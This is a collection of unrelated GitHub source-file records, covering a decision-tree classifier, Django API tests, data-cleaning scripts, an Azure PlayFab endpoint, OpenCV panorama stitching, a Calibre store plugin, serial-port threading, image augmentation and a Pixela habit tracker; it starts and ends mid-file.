score(self, X, y):\n X = utils.validate_type(X)\n y = utils.validate_type(y)\n correct = 0\n index = 0\n for row in X:\n prediction = self.predict(row)\n if y[index] == prediction:\n correct += 1\n index += 1\n return correct / float(len(X)) * 100.00\n\n def __sklearn_is_fitted__(self):\n return True\n\n def _predict(self, node, row):\n if 
row[node['index']] < node['value']:\n if isinstance(node['left'], dict):\n return self._predict(node['left'], row)\n else:\n return node['left']\n else:\n if isinstance(node['right'], dict):\n return self._predict(node['right'], row)\n else:\n return node['right']\n\n def predict(self, X):\n node = self._root\n X = utils.validate_type(X)\n if isinstance(X[0], list): # is list of list\n prediction_list = list()\n for row in X:\n prediction_list.append(self._predict(node, row))\n return numpy.asarray(prediction_list)\n else:\n return numpy.asarray(self._predict(node, X))\n","repo_name":"miguelangelmanuttupaligas/developmentDecisionTree","sub_path":"decisiontree/demo2.py","file_name":"demo2.py","file_ext":"py","file_size_in_byte":5796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"72113681550","text":"from rest_framework.test import APITestCase\nfrom rest_framework import status\nfrom rest_framework.test import APIClient\nfrom django.utils import timezone\nfrom .models import User, Track\n\n\nclass TrackTestCase(APITestCase):\n def setUp(self):\n self.user = User.objects.create_user(\"test\", \"test@gmail.com\", \"P@$$w0rd\", is_active=True)\n data = {\"email\": \"test@gmail.com\", \"password\": \"P@$$w0rd\"}\n self.token_jwt = self.get_token(data)\n self.client = APIClient()\n\n def get_token(self, data):\n # Get Access JWT Bearer\n response = self.client.post('/auth/jwt/create/', data)\n self.assertEquals(response.status_code, status.HTTP_200_OK)\n return response.data.get(\"access\")\n\n def test_should_add_track(self, token=None):\n if token is None:\n token = self.token_jwt\n self.client.credentials(HTTP_AUTHORIZATION='Bearer ' + token)\n data = {'time_start': timezone.now(), 'time_finish': timezone.now(), 'duration': 100, 'track_length': 1.43}\n response = self.client.post(\"/api/my-tracks/\", data)\n self.assertEquals(response.status_code, status.HTTP_201_CREATED)\n\n def test_should_not_add_track(self):\n first_time = timezone.now()\n bad_finish_time = first_time - timezone.timedelta(days=100)\n self.client.credentials(HTTP_AUTHORIZATION='Bearer ' + self.token_jwt)\n data = {'time_start': first_time, 'time_finish': bad_finish_time, 'duration': 100, 'track_length': 1.43}\n response = self.client.post(\"/api/my-tracks/\", data)\n self.assertEquals(response.status_code, status.HTTP_400_BAD_REQUEST)\n # self.assertContains(response.data.get('non_field_errors')[0][0], \"Koniec musi wystąpić po starcie!\")\n\n def test_should_get_my_tracks(self):\n # Add track\n self.test_should_add_track(self.token_jwt)\n self.client.credentials(HTTP_AUTHORIZATION='Bearer ' + self.token_jwt)\n response = self.client.get(\"/api/my-tracks/\")\n self.assertEquals(response.status_code, status.HTTP_200_OK)\n self.assertEquals(len(response.data), 1)\n\n def test_should_return_details(self):\n self.test_should_add_track(self.token_jwt)\n self.client.credentials(HTTP_AUTHORIZATION='Bearer ' + self.token_jwt)\n response = self.client.get(\"/api/track/1\")\n self.assertEquals(response.status_code, status.HTTP_200_OK)\n self.assertEquals(response.data.get('user'), Track.objects.get(pk=1).user_id)\n\n def test_should_not_return_details(self):\n self.test_should_add_track(self.token_jwt)\n self.client.credentials(HTTP_AUTHORIZATION='Bearer ' + self.token_jwt)\n response = self.client.get(\"/api/track/2\")\n self.assertEquals(response.status_code, status.HTTP_404_NOT_FOUND)\n\n def test_should_get_other_user_track(self):\n # Create second user and add him a 
track\n self.user_2 = User.objects.create_user(\"test2\", \"test2@gmail.com\", \"P@$$w0rd2\", is_active=True)\n data = {\"email\": \"test2@gmail.com\", \"password\": \"P@$$w0rd2\"}\n token_jwt_2 = self.get_token(data)\n self.test_should_add_track(token_jwt_2)\n\n # Find a user_2 tracks as main user\n self.client.credentials(HTTP_AUTHORIZATION='Bearer ' + self.token_jwt)\n response = self.client.get(\"/api/tracks/?id=2\")\n self.assertEquals(response.status_code, status.HTTP_200_OK)\n","repo_name":"DanielSzarek/HulApp","sub_path":"backend/backend/track/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3401,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"34444265831","text":"\ndef del_source_one():\n one = {}.fromkeys(range(1,13368))\n list = []\n list_source = []\n for i in one:\n one[i]=0\n with open('../../data/Douban_Movie/user_movie.dat','r') as f:\n for line in f.readlines():\n list_source.append(line)\n line = int(str(line.strip().split()[0]))\n one[line]=one[line]+1\n f.close()\n\n for i in one:\n if one[i] == 1:\n list.append(i)\n print (len(list))\n for i in list:\n one.pop(i)\n print(len(one))\n\n with open('../../data/Douban_Movie/user_movie_process.dat','w') as f_new:\n for i in list_source:\n temp = int(str(i.strip().split()[0]))\n if temp not in list:\n f_new.write(i)\n f_new.close()\n\ndef del_moive_type():\n one = {}.fromkeys(range(1,12678))\n for i in one:\n one[i]=0\n with open('../../data/Douban_Movie/embeddings/mtm_0.8.embedding','r') as f:\n for line in f.readlines():\n if len(line.strip('\\n').split())==2:\n pass\n else:\n line = int(str(line.strip().split()[0]))\n one[line]=one[line]+1\n f.close()\n\n for i in one:\n if one[i] !=1:\n print(i)\n\ndef del_user_embedding():\n one = {}.fromkeys(range(1,12678))\n for i in one:\n one[i]=0\n with open('../../data/Douban_Movie/embeddings/mtm_0.8.embedding','r') as f:\n for line in f.readlines():\n if len(line.strip('\\n').split())==2:\n pass\n else:\n line = int(str(line.strip().split()[0]))\n one[line]=one[line]+1\n f.close()\n\n for i in one:\n if one[i] !=1:\n print(i)\n#del_source_one()\n#del_moive_type()\ndel_user_embedding()\n","repo_name":"izhaojinlong/My_rec","sub_path":"HERec/ncf_modify/src/douban_process.py","file_name":"douban_process.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"71734781392","text":"#exC\ndef main():\n locais = {}\n\n locais['34242'] = ['Rua das Flores']\n locais['12343'] = ['Rua dos nerds']\n locais['5433'] = ['Rua dos jogadores']\n locais['87686'] = ['Rua dos cataventos']\n\n #for i in locais.keys():\n # print (i)\n\n if '123143' in locais.keys():\n print(\"Esse CEP já está cadastrado!\")\n else:\n print(\"Esse CEP NÃO está cadastrado!\")\n\n for i in locais.values():\n if 'Rua dos cataventos' in i:\n print(\"Esse endereço já está cadastrado!\")\n \n\nmain()\n","repo_name":"Alinemm/ed20201","sub_path":"Aula06-Dicionarios/exercicioC.py","file_name":"exercicioC.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"72067811792","text":"import azure.functions as func\nfrom PlayFabUtil.Admin.profile import PROFILE\nfrom PlayFabUtil.User.authorize import AUTHORIZE\nfrom Security import authorize_check\nfrom HttpMessageHandling import request_validation, response_handler, request_model\nimport logging\n\nclass 
GET_ACCOUNT_INFO_DTO:\n def __init__(self, playfab_id: str = None, ignore_missing_title_activation: bool = None) -> None:\n self.PlayFabId = playfab_id\n self.IgnoreMissingTitleActivation = ignore_missing_title_activation\n\ndef main(req: func.HttpRequest, context: func.Context) -> func.HttpResponse:\n if not request_validation.is_valid_json(req, context):\n return response_handler.send_invalid_json_response()\n req_body = req.get_json()\n is_x_auth_header = authorize_check.is_contain_x_auth_header(req)\n if not is_x_auth_header:\n return response_handler.send_unauth_response()\n x_auth_header = authorize_check.get_x_auth(req)\n authorize = AUTHORIZE(\n session_ticket = x_auth_header\n )\n if not authorize.is_valid_session_ticket():\n return response_handler.send_unauth_response()\n playfab_id = authorize.get_playfab_id_from_entity_id()\n # request_dto = request_model.COMMON_REQUEST_DTO(\n # key_id = req_body.get('KeyId'),\n # data = req_body.get('Data')\n # )\n request_dto = request_model.NO_DATA_REQUEST_DTO(\n key_id = req_body.get('KeyId')\n )\n is_missing_param, missing_key = request_validation.is_missing_param(request_dto)\n if is_missing_param:\n return response_handler.send_missing_params_response(missing_key)\n # decrypted_json_object = request_handler.decrypt(request_dto)\n # playfab_get_acc_info_dto = GET_ACCOUNT_INFO_DTO(\n # playfab_id = decrypted_json_object.get('PlayFabId')\n # )\n # is_missing_param, missing_key = request_validation.is_missing_param(playfab_get_acc_info_dto)\n # if is_missing_param:\n # return response_handler.send_missing_params_response(missing_key)\n # playfab_get_acc_info = PROFILE(x_auth_header)\n # playfab_get_acc_info.get_account_info(playfab_get_acc_info_dto)\n playfab_get_acc_info_dto = GET_ACCOUNT_INFO_DTO(\n playfab_id = playfab_id,\n ignore_missing_title_activation = False\n )\n playfab_get_acc_info = PROFILE()\n playfab_get_acc_info.get_account_info(playfab_get_acc_info_dto)\n return response_handler.send_common_response(request_dto.KeyId, playfab_get_acc_info)","repo_name":"this-post/Insecure-Game-Server","sub_path":"GetAccountInfo/get_account_info.py","file_name":"get_account_info.py","file_ext":"py","file_size_in_byte":2447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"15792018501","text":"# -*- coding: utf-8 -*-\n\nfrom brainpy import errors\nfrom brainpy.base.base import Base\nfrom brainpy.base import collector\n\nmath = None\n\n__all__ = [\n 'Function',\n]\n\n\ndef _check_node(node):\n if not isinstance(node, Base):\n raise errors.BrainPyError(f'Element in \"nodes\" must be an instance of '\n f'{Base.__name__}, but we got {type(node)}.')\n\n\ndef _check_var(var):\n global math\n if math is None: from brainpy import math\n if not isinstance(var, math.ndarray):\n raise errors.BrainPyError(f'Element in \"dyn_vars\" must be an instance of '\n f'{math.ndarray.__name__}, but we got {type(var)}.')\n\n\nclass Function(Base):\n \"\"\"The wrapper for Python functions.\n\n Parameters\n ----------\n f : function\n The function to wrap.\n nodes : optional, Base, sequence of Base, dict\n The nodes in the defined function ``f``.\n dyn_vars : optional, ndarray, sequence of ndarray, dict\n The dynamically changed variables.\n name : optional, str\n The function name.\n \"\"\"\n\n def __init__(self, f, nodes=None, dyn_vars=None, name=None):\n # initialize \n # ---\n self._f = f\n if name is None:\n name = self.unique_name(type_=f.__name__ if hasattr(f, '__name__') else 'Function')\n 
super(Function, self).__init__(name=name)\n\n    # nodes \n    # ---\n    if nodes is not None:\n      self.implicit_nodes = collector.Collector()\n      if isinstance(nodes, Base):\n        nodes = (nodes,)\n      if isinstance(nodes, (tuple, list)):\n        for i, node in enumerate(nodes):\n          _check_node(node)\n          self.implicit_nodes[f'_node{i}'] = node\n      elif isinstance(nodes, dict):\n        for node in nodes.values():\n          _check_node(node)\n        self.implicit_nodes.update(nodes)\n      else:\n        raise ValueError(f'\"nodes\" only support list/tuple/dict of {Base.__name__}, '\n                         f'but we got {type(nodes)}: {nodes}')\n\n    # variables\n    # ---\n    if dyn_vars is not None:\n      self.implicit_vars = collector.TensorCollector()\n      global math\n      if math is None: from brainpy import math\n      if isinstance(dyn_vars, math.ndarray):\n        dyn_vars = (dyn_vars,)\n      if isinstance(dyn_vars, (tuple, list)):\n        for i, v in enumerate(dyn_vars):\n          _check_var(v)\n          self.implicit_vars[f'_var{i}'] = v\n      elif isinstance(dyn_vars, dict):\n        for v in dyn_vars.values():\n          _check_var(v)\n        self.implicit_vars.update(dyn_vars)\n      else:\n        raise ValueError(f'\"dyn_vars\" only support list/tuple/dict of {math.ndarray.__name__}, '\n                         f'but we got {type(dyn_vars)}: {dyn_vars}')\n\n  def __call__(self, *args, **kwargs):\n    return self._f(*args, **kwargs)\n","repo_name":"Ppl91/BrainPy","sub_path":"brainpy/base/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":2726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"83"}
{"seq_id":"43187215141","text":"import numpy as np\nimport cv2\nimport random\nfrom tqdm import tqdm\nfrom utils import solve_homography, warping\n\nrandom.seed(999)\n\ndef matches(img1, img2):\n    orb = cv2.ORB_create(nfeatures=1000)\n    kp_a, desc_a = orb.detectAndCompute(img1, None)\n    kp_b, desc_b = orb.detectAndCompute(img2, None)\n\n    bf = cv2.BFMatcher(cv2.NORM_HAMMING)\n    matches = bf.knnMatch(desc_a, desc_b, k=2)\n\n    good_matches = []\n    for match_1, match_2 in matches:\n        if match_1.distance < 0.8 * match_2.distance:\n            good_matches.append(match_1)\n    \n    #filter good matching keypoints \n    good_kp_a = []\n    good_kp_b = []\n\n    for match in good_matches:\n        good_kp_a.append(kp_a[match.queryIdx].pt) # keypoint in image A\n        good_kp_b.append(kp_b[match.trainIdx].pt) # matching keypoint in image B\n    return np.array(good_kp_a).astype(int), np.array(good_kp_b).astype(int)\n\ndef transform_with_homography(H, points):\n    ones = np.ones((points.shape[0], 1))\n    points = np.concatenate((points, ones), axis=1)\n    transformed_points = H.dot(points.T)\n    transformed_points = transformed_points / (transformed_points[2,:][np.newaxis, :])\n    transformed_points = transformed_points[0:2,:].T\n\n    return transformed_points\n\ndef compute_outlier(H, points_a, points_b, threshold=3):\n    outliers_count = 0\n\n    points_img_b_transformed = transform_with_homography(H, points_b)\n\n    x = points_a[:, 0]\n    y = points_a[:, 1]\n    x_hat = points_img_b_transformed[:, 0]\n    y_hat = points_img_b_transformed[:, 1]\n    distance = np.sqrt(np.power((x_hat - x), 2) + np.power((y_hat - y), 2)).reshape(-1)\n    for dis in distance:\n        if dis > threshold:\n            outliers_count += 1\n    return outliers_count\n\ndef ransac_for_homography(matches_1, matches_2):\n\n    all_matches = matches_1.shape[0]\n    # RANSAC parameters\n    prob_success = 0.99\n    sample_points_size = 5\n    ratio_of_outlier = 0.5\n    N = int(np.log(1.0 - prob_success)/np.log(1 - (1 - ratio_of_outlier)**sample_points_size))\n\n    lowest_outlier = all_matches # Worst case: all the points are outliers\n    best_H = None\n\n    for i in range(N):\n        
rand_index = np.random.choice(all_matches, sample_points_size, replace=False)\n H = solve_homography(matches_2[rand_index], matches_1[rand_index])\n outliers_count = compute_outlier(H, matches_1, matches_2)\n if outliers_count < lowest_outlier:\n best_H = H\n lowest_outlier = outliers_count\n\n return best_H\n\ndef panorama(imgs):\n \"\"\"\n Image stitching with estimated homograpy between consecutive\n :param imgs: list of images to be stitched\n :return: stitched panorama\n \"\"\"\n h_max = max([x.shape[0] for x in imgs])\n w_max = sum([x.shape[1] for x in imgs])\n\n # create the final stitched canvas\n dst = np.zeros((h_max, w_max, imgs[0].shape[2]), dtype=np.uint8)\n dst[:imgs[0].shape[0], :imgs[0].shape[1]] = imgs[0]\n last_best_H = np.eye(3)\n out = None\n\n # for all images to be stitched:\n for idx in range(len(imgs) - 1):\n im1 = imgs[idx]\n im2 = imgs[idx + 1]\n\n # TODO: 1.feature detection & matching\n matches_1, matches_2 = matches(im1, im2)\n\n # TODO: 2. apply RANSAC to choose best H\n H = ransac_for_homography(matches_1, matches_2)\n\n # TODO: 3. chain the homographies\n last_best_H = last_best_H.dot(H)\n\n # TODO: 4. apply warping\n dst = warping(im2, dst, last_best_H, 'b')\n out = dst\n\n return out\n\nif __name__ == \"__main__\":\n # ================== Part 4: Panorama ========================\n # TODO: change the number of frames to be stitched\n FRAME_NUM = 3\n imgs = [cv2.imread('../resource/frame{:d}.jpg'.format(x)) for x in range(1, FRAME_NUM + 1)]\n output4 = panorama(imgs)\n cv2.imwrite('output4.png', output4)","repo_name":"come880412/ComputerVision_NTUEE_2022Spring","sub_path":"hw3/hw3/src/part4.py","file_name":"part4.py","file_ext":"py","file_size_in_byte":3818,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"83"} +{"seq_id":"21718596913","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import (unicode_literals, division, absolute_import, print_function)\nstore_version = 1 # Needed for dynamic plugin loading\n\n__license__ = 'GPL 3'\n__copyright__ = '2011, John Schember '\n__docformat__ = 'restructuredtext en'\n\nfrom calibre.gui2.store.basic_config import BasicStoreConfig\nfrom calibre.gui2.store.opensearch_store import OpenSearchOPDSStore\nfrom calibre.gui2.store.search_result import SearchResult\n\nclass ArchiveOrgStore(BasicStoreConfig, OpenSearchOPDSStore):\n\n open_search_url = 'http://bookserver.archive.org/catalog/opensearch.xml'\n web_url = 'http://www.archive.org/details/texts'\n\n # http://bookserver.archive.org/catalog/\n\n def search(self, query, max_results=10, timeout=60):\n for s in OpenSearchOPDSStore.search(self, query, max_results, timeout):\n s.detail_item = 'http://www.archive.org/details/' + s.detail_item.split(':')[-1]\n s.price = '$0.00'\n s.drm = SearchResult.DRM_UNLOCKED\n yield s\n\n def get_details(self, search_result, timeout):\n '''\n The opensearch feed only returns a subset of formats that are available.\n We want to get a list of all formats that the user can get.\n '''\n from calibre import browser\n from contextlib import closing\n from lxml import html\n\n br = browser()\n with closing(br.open(search_result.detail_item, timeout=timeout)) as nf:\n idata = html.fromstring(nf.read())\n formats = ', '.join(idata.xpath('//p[@id=\"dl\" and @class=\"content\"]//a/text()'))\n search_result.formats = formats.upper()\n\n return 
True\n","repo_name":"sss/calibre-at-bzr","sub_path":"src/calibre/gui2/store/stores/archive_org_plugin.py","file_name":"archive_org_plugin.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"83"} +{"seq_id":"18294172949","text":"import cv2\n\n# play with this script to figure out which camera you should use\n\n# source:\n# https://opencv-python-tutroals.readthedocs.io/en/latest/py_tutorials/py_gui/py_video_display/py_video_display.html#capture-video-from-camera\n\n# edit this value\nsource_index = 0\n\n\ncap = cv2.VideoCapture(source_index)\n\nwhile True:\n # Capture frame-by-frame\n ret, frame = cap.read()\n\n # Display the resulting frame\n cv2.imshow('frame', frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# When everything done, release the capture\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"Sijiba/GameWatcher-SmashUltimate","sub_path":"testVideoSource.py","file_name":"testVideoSource.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"40661574137","text":"import unittest\n\nimport reader\n\n\nclass TestReader(unittest.TestCase):\n\n def test_read_json_request(self):\n data = {\"tips\": [\"tip1\", \"tip2\"],\n \"usageInfo\": {\"action_id_1\": {\"usageCount\": 1,\n \"lastUsedTimestamp\": 10},\n \"action_id_2\": {\"usageCount\": 2,\n \"lastUsedTimestamp\": 12}},\n \"ideName\": \"IU\",\n \"bucket\": \"2\"}\n bucket, user_events, tips = reader.read_request_json(data)\n self.assertEqual(2, bucket)\n self.assertEqual({(\"actions.action.invoked\", \"action_id_1\"): (10, 1),\n (\"actions.action.invoked\", \"action_id_2\"): (12, 2)}, user_events)\n self.assertEqual([\"tip1\", \"tip2\"], tips)\n\n def test_read_tip_to_event(self):\n file_name = __file__[:-14] + \"test_html_to_event.csv\"\n tip_to_action_ids_dict, action_id_to_tips_dict = reader.read_tip_to_event(file_name)\n\n self.assertEqual({\"tip1.html\": [\"action_id_1\"], \"tip2.html\": [\"action_id_1\", \"action_id_3\"]}, tip_to_action_ids_dict)\n self.assertEqual({\"action_id_1\": [\"tip1.html\", \"tip2.html\"], \"action_id_3\": [\"tip2.html\"]}, action_id_to_tips_dict)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"JetBrains-Research/feature-recommendations","sub_path":"docker/test/reader_test.py","file_name":"reader_test.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"} +{"seq_id":"15151440097","text":"from re import split\nimport threading\nimport time\nimport serial\nimport SDtoXML\nimport numpy as np\n\nclass SerialThread():\n\n def __init__(self, bridge, isReader:bool, isReceptor:bool):\n self.ser = serial.Serial(timeout=0)\n self.bridge = bridge\n self.isReceptor = isReceptor\n if isReader:\n self.thr = threading.Thread(target=self.loopRead, daemon=True)\n else:\n self.thr = threading.Thread(target=self.playLog, daemon=True)\n self.period = 0 #log player precisa de um período\n self.splitMessages = None\n def startSerial(self, serial_port, baudrate):\n self.ser.port = serial_port\n self.ser.baudrate = baudrate\n self.ser.open()\n if self.ser.is_open:\n self.thr.stop_condition = False\n self.thr.start()\n def loopRead(self):\n while(self.ser.is_open and not self.thr.stop_condition):\n #Delay para acumular mais dados no buffer de recepção\n time.sleep(0.05)\n readLength = self.ser.in_waiting\n s = 
self.ser.read(readLength)\n            if s:\n                if self.isReceptor:\n                    self.bridge.serialStringsDict[self.ser.port] = s.decode(\"ISO-8859-1\")\n                    # self.bridge.componentsQueue.put(lambda: self.bridge.updateComponents(s))\n                    self.bridge.updateComponents(s)\n                    # self.bridge.serialStringsDict[self.ser.port] = s.hex()\n                    self.bridge.setConsoleText.emit(self.bridge.serialStringsDict[self.ser.port], str(self.ser.port))\n                else:\n                    self.bridge.serialStringsDict[self.ser.port] = s.decode(\"ISO-8859-1\")\n                    self.bridge.setConsoleText.emit(self.bridge.serialStringsDict[self.ser.port], str(self.ser.port))\n        # self.data_stream = property(\"text\")\n\n\n    def playLog(self):\n        if self.splitMessages is not None and self.period != 0:\n            for msg in self.splitMessages:\n                if len(msg) > 4:\n                    msg = np.delete(msg, 4) #deleta o timeDelta da msg do datalogger\n                    msg = np.insert(msg[2:], 0, [85,83,80], axis = 0)\n                    self.ser.write(msg)\n                    time.sleep(self.period/100)\n\n    def closeSerial(self):\n        try:\n            if self.thr.is_alive():\n                self.thr.stop_condition = True\n            self.ser.close()\n        except Exception:\n            pass\n\nclass LogConversionThread():\n    def __init__(self, bridge, params:SDtoXML.XMLParams):\n        self.thr = threading.Thread(target=SDtoXML.convertLog, args=(bridge,params), daemon=True)\n    def start(self):\n        self.thr.start()","repo_name":"artur-chagas/ltv-pyqt","sub_path":"formulaThread.py","file_name":"formulaThread.py","file_ext":"py","file_size_in_byte":2700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"4427542510","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 9 18:27:21 2021\n\n@author: Purnendu Mishra\n\"\"\"\n\nimport cv2\nimport numpy as np\nfrom pathlib import Path\nfrom matplotlib import pyplot as plt\n\nfrom skimage.io import imread\n\n\n#%%\ndef random_translation(x, y, alpha = 0.2):\n    \n    h, w = x.shape[:2]\n    \n    y[:,0] *= w\n    y[:,1] *= h\n    \n    # The maximum translation along each dimension\n    tx = np.random.uniform(-alpha, alpha) * w # translation along image width\n    ty = np.random.uniform(-alpha, alpha) * h # translation along image height\n    \n    # The translation matrix\n    T = np.array([[1,0,tx], [0,1,ty]], dtype = np.float32)\n    \n    # The image translation\n    xT = cv2.warpAffine(x, T, (w, h))\n    \n    # Translation of hand keypoints\n    ## Converting into homogenous coordinate system\n    T_ = np.append(T , np.array([[0,0,1]], dtype = np.float32), axis = 0)\n    \n    K = y.shape[0]\n    # Converting keypoints coordinates into homogenous coordinate system\n    y_ = np.append(y.T, np.ones((1,K), dtype = np.float32), axis = 0) # shape = 3 X K\n    yT = np.matmul(T_, y_)[:2,:].T\n    \n    # Limit the keypoints between 0 and h or w\n    # yT[:,0] = yT[:,0].clip(min = 0, max = w - 1) / w\n    # yT[:,1] = yT[:,1].clip(min = 0, max = h - 1) / h\n    \n    for i in range(K):\n        a = yT[i, 0]\n        b = yT[i, 1]\n        \n        if a > w - 1 or b > h - 1:\n            yT[i] = 0.\n        elif a < 0. or b < 0.:\n            yT[i] = 0. \n        else:\n            pass\n    \n    \n    yT[:,0] /= w\n    yT[:,1] /= h\n    \n    return (xT, yT)\n\n\ndef random_rotation(x, y, max_theta = 30):\n    \n    theta = np.random.uniform(-1.,1.) * max_theta # Angle in degrees\n    \n    scale = np.random.uniform(0.25, 1.0) + 0.25 \n    \n    h, w = x.shape[:2]\n    \n    y[:,0] *= w\n    y[:,1] *= h\n    \n    # Rotating with respect to center of the image\n    Rr = cv2.getRotationMatrix2D((w//2, h//2), theta, scale)\n    \n    # The rotated image will be\n    xR = cv2.warpAffine(x, Rr, (w,h))\n    \n    # The modified Rotation matrix\n    Rm = np.append(Rr, np.array([[0,0,1]]), axis = 0)\n    \n    # Rotate the keypoints\n    K = y.shape[0] # No. 
of keypoints\n y_ = np.append(y.T, np.ones((1,K), dtype = np.float32), axis = 0)\n \n # The rotated keypoints\n yR = np.matmul(Rm, y_)[:2].T\n \n for i in range(K):\n a = yR[i, 0]\n b = yR[i, 1]\n \n if a > w - 1 or b > h - 1:\n yR[i] = 0.\n elif a < 0. or b < 0.:\n yR[i] = 0. \n else:\n pass\n \n # Normalize the keypoints\n yR[:,0] /= w\n yR[:,1] /= h\n \n return (xR, yR)\n\n#%%\nif __name__=='__main__':\n \n \n img_path = Path.cwd()/'test_img.jpg'\n\n x = imread(img_path)\n image = x.copy()\n y = np.load('test_img_labels.npy')\n\n h, w = x.shape[:2]\n \n if np.random.rand() > 0.5:\n print('random translation')\n x, y = random_translation(x = x, y = y, alpha = 0.2)\n \n if np.random.rand() > 0.5: \n print('random rotation')\n x, y = random_rotation(x = x, y = y, max_theta = 45)\n \n y[:,0] *= w\n y[:,1] *= h\n \n px , py = y.T\n \n fig = plt.figure(figsize = (10,10))\n plt.subplot(1,2,1)\n plt.imshow(image)\n plt.subplot(1,2,2)\n plt.imshow(x)\n plt.scatter(px, py, c='r')\n plt.show()\n\n ","repo_name":"puruBHU/ComputerVisionCodes","sub_path":"AffineTransforms/test_rotation_and_translation.py","file_name":"test_rotation_and_translation.py","file_ext":"py","file_size_in_byte":3353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"5188616220","text":"from enum import auto\nfrom enum import unique\nfrom nf_common_source.code.nf.types.column_types import ColumnTypes\n\n\n@unique\nclass ExtendedTDiagramobjectsColumnTypes(\n ColumnTypes):\n T_DIAGRAMOBJECTS_COMPOSITE_EA_GUIDS = auto()\n T_DIAGRAMOBJECTS_EA_HUMAN_READABLE_NAMES = auto()\n\n def __column_name(\n self) \\\n -> str:\n column_name = \\\n column_name_mapping[self]\n\n return \\\n column_name\n\n column_name = \\\n property(\n fget=__column_name)\n\n\ncolumn_name_mapping = \\\n {\n ExtendedTDiagramobjectsColumnTypes.T_DIAGRAMOBJECTS_COMPOSITE_EA_GUIDS: 't_diagramobjects_composite_ea_guids',\n ExtendedTDiagramobjectsColumnTypes.T_DIAGRAMOBJECTS_EA_HUMAN_READABLE_NAMES: 't_diagramobjects_ea_human_readable_names'\n }\n","repo_name":"boro-alpha/nf_ea_common_tools","sub_path":"nf_ea_common_tools_source/b_code/nf_ea_common/common_knowledge/column_types/extended_t/extended_t_diagramobjects_column_types.py","file_name":"extended_t_diagramobjects_column_types.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"24851733347","text":"from evado.models import CursoProfesor, AplicarUniversoEncuestaPersona\n\n\ndef profesor_evaluacion_alumno(documento, ue):\n materias_profesor = CursoProfesor.objects.filter(rut__iexact=documento)\n total_encuestas = 0\n total_respuestas = 0\n for x in materias_profesor:\n codigo = x.codigo\n encuestas = AplicarUniversoEncuestaPersona.objects.filter(\n universo_encuesta=ue,\n curso_alumno__cod_curso__iexact=codigo,\n finalizado__isnull=False\n )\n for e in encuestas:\n total_respuestas += e.total_respuestas\n total_encuestas += encuestas.count()\n docente = materias_profesor.first()\n lista = map(lambda x: x.codigo, materias_profesor)\n total_alumnos = AplicarUniversoEncuestaPersona.objects.filter(\n universo_encuesta=ue,\n curso_alumno__cod_curso__in=lista\n ).distinct()\n return {\n 'Nombres': docente.nombres, 'Apellidos': docente.apellidos, 'Rut': docente.rut,\n 'Total Encuestas': total_encuestas, 'Total Respuestas': total_respuestas,\n 'Total Materias': materias_profesor.count(), 'Total Alumnos': total_alumnos.count()\n 
}\n","repo_name":"j-alexander-acosta/AAGESuite","sub_path":"evado/extras.py","file_name":"extras.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"13897270563","text":"import requests\nfrom datetime import datetime\n\nUSERNAME = \"YOUR_USERNAME\"\nTOKEN = \"YOUR_CREATED_TOKEN\"\nGRAPH_ID = \"YOUR_GRAPH_NAME\"\n\npixela_endpoint = \"https://pixe.la/v1/users\"\n\nuser_params = {\n \"token\": TOKEN,\n \"username\": USERNAME,\n \"agreeTermsOfService\": \"yes/no\",\n \"notMinor\": \"yes/no\",\n}\n\n# Creating a user\n# response = requests.post(url=pixela_endpoint, json=user_params)\n# print(response.text)\n\n# Creating a graph\ngraph_endpoint = f\"{pixela_endpoint}/{USERNAME}/graphs\"\n\ngraph_params = {\n \"id\": GRAPH_ID,\n \"name\": \"Program Graph\",\n \"unit\": \"Hours\",\n \"type\": \"float\",\n \"color\": \"sora\",\n}\n\ngraph_headers = {\n \"X-USER-TOKEN\": TOKEN\n}\n\n# response = requests.post(url=graph_endpoint, json=graph_params, headers=graph_headers)\n# print(response.text)\n\n# Creating a Habit Pixel in graph\npixelcreation_endpoint = f\"{pixela_endpoint}/{USERNAME}/graphs/{GRAPH_ID}\"\n\ntoday_date = datetime.now().strftime(\"%Y%m%d\")\n\npixel_data = {\n \"date\": today_date,\n \"quantity\": \"2\",\n}\n\nresponse = requests.post(url=pixelcreation_endpoint, headers=graph_headers, json=pixel_data)\nprint(response.text)\n\n# Update a Habit pixel in graph\nday_update = \"20231212\"\n\nupdate_endpoint = f\"{pixela_endpoint}/{USERNAME}/graphs/{GRAPH_ID}/{day_update}\"\n\npixel_update = {\n \"quantity\": \"3\"\n}\n\n# response = requests.put(url=update_endpoint, headers=graph_headers, json=pixel_update)\n# print(response.text)\n\n# Delete a Habit pixel data in graph\nday_delete = 